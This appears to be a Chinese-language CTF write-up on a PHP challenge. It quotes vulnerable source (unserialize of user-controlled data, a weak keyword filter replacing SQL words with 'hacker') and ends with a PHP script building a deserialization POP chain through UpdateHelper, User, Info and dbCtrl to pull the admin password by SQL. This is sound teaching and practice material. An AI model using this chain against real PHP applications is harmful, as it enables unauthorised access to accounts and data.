//lib.php->User类 public function update(){ $Info=unserialize($this->getNewinfo()); $age=$Info->age; $nickname=$Info->nickname; $updateAction=new UpdateHelper($_SESSION['id'],$Info,"update user SET age=$age,nickname=$nickname where id=".$_SESSION['id']); //这个功能还没有写完 先占坑 }
我们发现,有个反序列化。 继续看看getNewinfo:
1 2 3 4 5
public function getNewInfo(){ $age=$_POST['age']; $nickname=$_POST['nickname']; return safe(serialize(new Info($age,$nickname))); }
它实例化一个Info类并且序列化,且参数可控。然后到safe去过滤一下:
1 2 3 4
function safe($parm){ $array= array('union','regexp','load','into','flag','file','insert',"'",'\\',"*","alter"); return str_replace($array,'hacker',$parm); }
class Info{ public $age; public $nickname; public $CtrlCase; public function __construct($age,$nickname){ $this->age=$age; $this->nickname=$nickname; } public function __call($name,$argument){ echo $this->CtrlCase->login($argument[0]); } }
class dbCtrl { public $hostname="127.0.0.1"; public $dbuser="root"; public $dbpass="root"; public $database="test"; public $name; public $password; public $mysqli; public $token; public function __construct() { $this->name=$_POST['username']; $this->password=$_POST['password']; $this->token=$_SESSION['token']; } public function login($sql) { $this->mysqli=new mysqli($this->hostname, $this->dbuser, $this->dbpass, $this->database); if ($this->mysqli->connect_error) { die("连接失败,错误:" . $this->mysqli->connect_error); } $result=$this->mysqli->prepare($sql); $result->bind_param('s', $this->name); $result->execute(); $result->bind_result($idResult, $passwordResult); $result->fetch(); $result->close(); if ($this->token=='admin') { return $idResult; } if (!$idResult) { echo('用户不存在!'); return false; } if (md5($this->password)!==$passwordResult) { echo('密码错误!'); return false; } $_SESSION['token']=$this->name; return $idResult; }
Class UpdateHelper{ public $id; public $newinfo; public $sql; public function __construct($newInfo,$sql){ $newInfo=unserialize($newInfo); $upDate=new dbCtrl(); } public function __destruct() { echo $this->sql; } }
<?php class User { public $id; public $age=null; public $nickname=null; } class Info { public $age; public $nickname; public $CtrlCase; public function __construct($age,$nickname){ $this->age=$age; $this->nickname=$nickname; } } class UpdateHelper { public $id; public $newinfo; public $sql; } class dbCtrl { public $hostname="127.0.0.1"; public $dbuser="noob123"; public $dbpass="noob123"; public $database="noob123"; public $name='admin'; public $password; public $mysqli; public $token; } $d = new dbCtrl(); $d->token='admin'; $b = new Info('','1'); $b->CtrlCase=$d; $a = new user(); $a->nickname=$b; $a->age="select password,id from user where username=?"; $c=new UpdateHelper(); $c->sql=$a;